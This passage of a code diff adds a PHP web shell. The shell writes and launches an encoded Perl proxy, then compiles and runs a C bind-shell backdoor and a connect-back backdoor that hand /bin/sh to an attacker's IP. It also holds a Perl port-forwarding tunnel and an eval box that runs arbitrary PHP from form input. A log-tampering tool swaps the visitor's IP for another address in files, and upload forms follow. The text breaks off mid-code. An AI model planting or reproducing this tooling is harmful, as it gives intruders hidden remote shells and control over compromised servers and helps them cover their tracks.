QgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêğûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïğåğâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïğîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïğîøåë óñïåøíî, çàêğûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ğåäèğåêò íà \$o->{'tohost'}, ïîğò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïğåğâàí ğåäèğåêò íà %s, ïîğò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïğåğâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëş÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïğè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïğîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
